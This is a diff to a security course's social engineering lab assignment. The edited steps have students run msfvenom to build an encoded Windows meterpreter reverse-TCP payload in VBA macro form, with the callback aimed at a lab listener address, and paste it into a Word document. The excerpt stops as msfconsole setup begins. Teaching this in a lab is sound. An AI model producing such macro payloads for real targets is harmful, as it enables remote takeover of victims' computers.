deargle/deargle.github.io/_security_assignments/lab_social_engineering.md

 1. In Kali, run the following command (all one line):

-        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.1.61 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe > /tmp/vb_code.txt
+        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.1.61 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

-2. Open the `vb_code.txt` file, copy the code, and paste it into a text file on your Windows VM workstation.
+2. Read the beginning of the output.
+It explains that the output is divided into two sections: A "Macro" section and a "Payload" section.
+Copy _all_ of the output from your terminal from this command, and paste it into a text file on your Windows VM (or onto a machine with Microsoft Word).

 3. In Kali, run msfconsole and run the following commands: